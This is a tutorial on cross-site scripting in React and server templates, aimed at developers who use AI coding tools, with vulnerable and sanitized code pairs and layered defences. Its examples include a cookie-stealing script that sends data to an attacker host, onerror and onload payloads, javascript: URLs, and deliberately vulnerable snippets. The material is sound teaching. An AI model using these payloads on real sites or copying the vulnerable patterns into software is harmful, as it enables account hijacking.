TL;DR: XSS (Cross-Site Scripting) happens when malicious JavaScript gets injected into a webpage and executes in other users' browsers. It can steal session tokens, hijack accounts, and redirect users. React prevents most XSS by escaping content automatically — but dangerouslySetInnerHTML, unvalidated URL parameters, and raw DOM manipulation break that protection. These patterns appear frequently in AI-generated code.
Why AI Coders Need to Know This
XSS sits in OWASP's Top 10 — since the 2021 edition it is folded into A03: Injection, one of the highest-ranked categories. HackerOne's bug bounty reports have repeatedly ranked XSS as the single most-reported vulnerability class, accounting for roughly a quarter of all valid reports. It is the most common vulnerability found in web applications that accept user input.
For vibe coders, XSS is especially relevant because:
- Any app that displays user-generated content — comments, usernames, search queries, profile bios — is a potential XSS target
- AI tools generate dangerouslySetInnerHTML for rich text features without always warning you about the implications
- Templates and string interpolation in server-rendered pages are common XSS sources in AI-generated backend code
- The attack is invisible to the victim — they load a normal-looking page and their session is already compromised
The good news: React's default rendering protects you from the most common XSS patterns automatically. The bad news: there are specific anti-patterns AI produces that bypass that protection completely.
How XSS Works
XSS exploits a simple fact: browsers cannot distinguish between "this JavaScript is part of the application" and "this JavaScript came from user input." If user-provided text ends up in a page as executable HTML, the browser runs it.
The basic attack
Imagine a comment section. A user submits this as their comment:
<script>
  // Sends the victim's cookies to the attacker's server
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
If the server saves this text and renders it directly into HTML without escaping it:
<!-- Vulnerable — directly injects user content as HTML -->
<div class="comment">
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
</div>
Every user who loads that page has their session cookie sent to the attacker. The attacker can then use that cookie to log in as those users — no password required.
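The flaw reduces to a few lines: if the server builds HTML by string concatenation, user input passes straight through as markup. A minimal sketch — the `renderComment` helper is hypothetical, standing in for whatever templating the server does:

```javascript
// ❌ VULNERABLE — hypothetical renderer that concatenates user input into HTML.
// Nothing stops markup inside the comment from becoming real, executable HTML.
function renderComment(content) {
  return '<div class="comment">' + content + '</div>';
}

const payload =
  '<script>fetch("https://attacker.com/steal?cookie=" + document.cookie)</script>';
const html = renderComment(payload);

// The payload survives intact — any browser parsing this HTML executes it.
console.log(html.includes('<script>')); // true
```

Everything that follows in this article is about making sure that `includes('<script>')` check can never come back true for user-controlled data.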
The three types of XSS
Stored XSS
Malicious script is saved to the database (comment, profile, post). Every user who loads the page gets attacked. Most dangerous.
Reflected XSS
Payload in a URL parameter gets echoed in the response. Requires victim to click a crafted link. Common in search pages and error messages.
DOM-Based XSS
JavaScript reads from a dangerous source (like window.location.hash) and writes it to the DOM unsafely. Happens entirely in the browser with no server involvement. Common in single-page apps.
Real Scenario
You asked Cursor to add a blog with a comment system. Users can submit comments with basic formatting (bold, italic). The AI decides to use dangerouslySetInnerHTML to render the formatted text.
Prompt I Would Type
Add a comment section to my blog where:
- Users can submit comments
- Comments support basic HTML formatting (bold, italic, links)
- Comments are stored in the database and displayed to all visitors
- Make sure it is safe from XSS attacks
- Show me the vulnerable version first, then the safe version
What AI Generated
The vulnerable version (what AI often generates for "support HTML formatting"):
// ❌ VULNERABLE — renders raw HTML from user input
function Comment({ comment }) {
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: comment.content }}
/>
);
}
// Note: browsers do not execute <script> tags inserted via innerHTML,
// but plenty of other payloads do execute. Any user can submit:
// <img src=x onerror="steal(document.cookie)">
// <svg onload="steal(document.cookie)">
The safe version using DOMPurify to sanitize HTML before rendering:
// ✅ SAFE — sanitize HTML before rendering
import DOMPurify from 'dompurify';
function Comment({ comment }) {
// DOMPurify strips all script tags, event handlers, and dangerous attributes
const safeHTML = DOMPurify.sanitize(comment.content, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href'], // Only allow href on anchor tags
ALLOW_DATA_ATTR: false
});
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: safeHTML }}
/>
);
}
// Install: npm install dompurify (recent versions bundle their own TypeScript types)
DOMPurify strips <script> tags, onerror handlers, javascript: URLs, and every other XSS vector while preserving the safe formatting tags. It is the industry standard for this use case.
Understanding Each Part
Why React is mostly safe by default
React escapes all values you embed in JSX automatically. When you write:
const userInput = '<script>alert("xss")</script>';
return <div>{userInput}</div>;
React renders this as the literal text <script>alert("xss")</script> — visible text on the page, not executable HTML. The angle brackets are converted to the HTML entities &lt; and &gt;. This is automatic and covers the vast majority of cases.
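The escaping React performs boils down to replacing HTML metacharacters with entities before they reach the DOM. A rough sketch of the idea — not React's actual implementation, but the effect is the same:

```javascript
// Illustrative escaper mirroring what JSX interpolation does for you.
function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;') // must run first so later entities aren't double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const userInput = '<script>alert("xss")</script>';
console.log(escapeHtml(userInput));
// &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

The browser displays the entities as the original characters, but never parses them as tags — the payload becomes inert text.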
dangerouslySetInnerHTML — the override
The name is a warning. dangerouslySetInnerHTML explicitly bypasses React's escaping and injects raw HTML. It is necessary for legitimate use cases (rendering markdown, rich text from a CMS) but requires sanitization before use. AI reaches for it whenever a feature involves "displaying HTML content."
Other XSS bypass patterns in AI code
href attribute with user input:
// ❌ VULNERABLE — javascript: URLs execute code
const url = user.website; // User submits: javascript:steal(document.cookie)
return <a href={url}>Visit site</a>;
// ✅ SAFE — validate URL scheme
const safeUrl = url.startsWith('https://') || url.startsWith('http://')
? url : '#';
return <a href={safeUrl} rel="noopener noreferrer">Visit site</a>;
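A more robust version of the scheme check uses the URL constructor, which normalizes tricks the startsWith check misses, such as mixed-case schemes like JaVaScRiPt:. A sketch — the helper name and protocol allow-list are ours:

```javascript
// Allow-list of URL schemes; everything else falls back to a harmless '#'.
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

function safeHref(raw) {
  try {
    const url = new URL(raw); // throws on relative or malformed input
    return SAFE_PROTOCOLS.has(url.protocol) ? url.href : '#';
  } catch {
    return '#'; // reject rather than guess
  }
}

console.log(safeHref('https://example.com/page'));          // https://example.com/page
console.log(safeHref('javascript:steal(document.cookie)')); // #
console.log(safeHref('JaVaScRiPt:alert(1)'));               // #
```

Rejecting relative URLs is a deliberate design choice here — user-submitted "website" fields should be absolute. Loosen the fallback if your use case allows relative paths.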
innerHTML in vanilla JavaScript:
// ❌ VULNERABLE — direct DOM manipulation with user content
document.getElementById('output').innerHTML = searchQuery;
// ✅ SAFE — use textContent for plain text
document.getElementById('output').textContent = searchQuery;
// Or sanitize if HTML is needed:
document.getElementById('output').innerHTML = DOMPurify.sanitize(searchQuery);
Server-side template injection (Express/EJS):
// ❌ VULNERABLE — unescaped variable in EJS template
<h1>Results for: <%- searchQuery %></h1>
// ^^ raw output — no escaping
// ✅ SAFE — escaped output
<h1>Results for: <%= searchQuery %></h1>
// ^^ auto-escaped
What AI Gets Wrong About XSS
Using dangerouslySetInnerHTML without sanitization
AI generates dangerouslySetInnerHTML={{ __html: userContent }} without DOMPurify. Often rationalized as "the data comes from our database" — but the data in your database came from user input at some point.
innerHTML for DOM manipulation
When AI writes vanilla JavaScript to update the DOM, it often uses .innerHTML = value. If value contains any user-influenced data, this is XSS. Use .textContent for plain text or DOMPurify for HTML.
Unvalidated redirect URLs
AI builds redirect functionality like window.location = params.get('redirect') (or res.redirect(req.query.redirect) on the server) without validating the target. An attacker crafts ?redirect=javascript:maliciousCode() — assigning a javascript: URL to window.location executes it — or sends victims to an attacker-controlled phishing site.
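One way to harden a redirect parameter is to accept only same-site relative paths and reject anything carrying a scheme or authority. A sketch, with a hypothetical helper name:

```javascript
// Accept only same-site paths like '/dashboard'; reject absolute URLs,
// protocol-relative URLs ('//evil.com'), and scheme-carrying strings.
function safeRedirect(target, fallback = '/') {
  if (typeof target !== 'string') return fallback;
  if (!target.startsWith('/')) return fallback; // must be a path
  if (target.startsWith('//')) return fallback; // protocol-relative escape
  if (target.includes('\\')) return fallback;   // '/\evil.com' tricks in some browsers
  return target;
}

console.log(safeRedirect('/dashboard'));          // /dashboard
console.log(safeRedirect('https://evil.com'));    // /
console.log(safeRedirect('//evil.com'));          // /
console.log(safeRedirect('javascript:alert(1)')); // /
```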
Missing rel="noopener noreferrer" on external links
When AI renders user-submitted URLs as links, it often omits rel="noopener noreferrer". Without it, the linked page can access your page via window.opener — a related attack called reverse tabnabbing. Modern browsers now imply noopener on target="_blank" links, but setting it explicitly is still good practice.
The XSS Search Pattern
Search your codebase for these strings: dangerouslySetInnerHTML, .innerHTML =, document.write(, eval(, javascript:. Every match needs review. If any of them use user-provided data, you have a potential XSS vulnerability.
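The search can be automated with a small script. A sketch that flags those same patterns in a source string — the pattern list mirrors this section, so adjust it to your codebase:

```javascript
// Flags lines containing risky sinks; every hit deserves a manual review.
const RISKY_PATTERNS = [
  'dangerouslySetInnerHTML',
  '.innerHTML =',
  'document.write(',
  'eval(',
  'javascript:',
];

function findXssSinks(source) {
  return source.split('\n').flatMap((line, i) =>
    RISKY_PATTERNS
      .filter((p) => line.includes(p))
      .map((pattern) => ({ line: i + 1, pattern }))
  );
}

const sample = `
function Comment({ html }) {
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}
el.innerHTML = userData;
`;
console.log(findXssSinks(sample));
// [ { line: 3, pattern: 'dangerouslySetInnerHTML' }, { line: 5, pattern: '.innerHTML =' } ]
```

Run it over your source files (or wire the same patterns into grep or your linter) and triage each match: safe constant, needs sanitization, or needs a rewrite to textContent/JSX.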
Prevention and Defense-in-Depth
Layer 1: Output encoding (primary defense)
Always encode user data when rendering it. React does this automatically for JSX. For dangerouslySetInnerHTML use DOMPurify. For server-rendered templates use your template engine's escaping syntax.
Layer 2: Content Security Policy
Add a CSP header to restrict what JavaScript sources the browser will execute:
// Next.js — next.config.js
const securityHeaders = [
{
key: 'Content-Security-Policy',
value: [
"default-src 'self'",
"script-src 'self' 'nonce-{nonce}'", // Only scripts from your domain
"style-src 'self' 'unsafe-inline'",
"img-src 'self' data: https:",
"connect-src 'self' https://api.yourdomain.com"
].join('; ')
}
];
module.exports = {
  async headers() {
    return [{ source: '/(.*)', headers: securityHeaders }];
  }
};
A strict CSP means that even if an attacker injects a <script> tag, the browser refuses to execute it because it is not from an approved source.
Layer 3: HttpOnly cookies
If session cookies have the HttpOnly flag, JavaScript cannot read them. This limits XSS damage — the attacker can manipulate the page but cannot steal the session token for use elsewhere.
// Express — set HttpOnly cookies
res.cookie('sessionId', token, {
httpOnly: true, // JavaScript cannot read this cookie
secure: true, // HTTPS only
sameSite: 'strict' // CSRF protection too
});
What to Learn Next
- What Is SQL Injection? — The other major injection attack class.
- Security Basics for AI Coders — The full security picture.
- Common Security Vulnerabilities — CSRF and other attacks beyond XSS.
- What Is Authentication? — Session management and why XSS against sessions is so damaging.
Next Step
Search your project for dangerouslySetInnerHTML right now. For each one, ask: does this content ever come from user input or a database? If yes, install DOMPurify and sanitize before rendering. This 10-minute check prevents the most common XSS attack path in React apps.
FAQ
What is XSS?
XSS (Cross-Site Scripting) is a vulnerability where an attacker injects malicious JavaScript into a webpage that other users then load. When their browser executes it, the attacker can steal session tokens, hijack accounts, redirect users, or log keystrokes — all without the victim knowing anything happened.
Does React protect against XSS by default?
React escapes all values inserted into JSX by default, preventing most XSS. However, dangerouslySetInnerHTML, unvalidated href attributes with javascript: URLs, and vanilla DOM manipulation with innerHTML all bypass React's protection. These patterns appear frequently in AI-generated code.
What is the difference between stored and reflected XSS?
Stored XSS saves the malicious payload in the database and attacks every user who loads the affected page. Reflected XSS puts the payload in a URL parameter; the server includes it in the response, but only affects users who click the crafted link. Stored XSS is more dangerous because it affects all visitors automatically.
What is a Content Security Policy (CSP)?
A CSP is an HTTP header that tells the browser which JavaScript sources are allowed to execute. Even if an attacker successfully injects a script tag, a strict CSP prevents the browser from running it. It is a critical defense-in-depth layer that reduces XSS impact significantly.
Does AI-generated code contain XSS vulnerabilities?
Yes, frequently. AI tools generate dangerouslySetInnerHTML for rich text rendering, innerHTML for DOM updates, and unvalidated URL attributes — all without sanitization. Always search for these patterns in AI-generated code and verify they handle user input safely.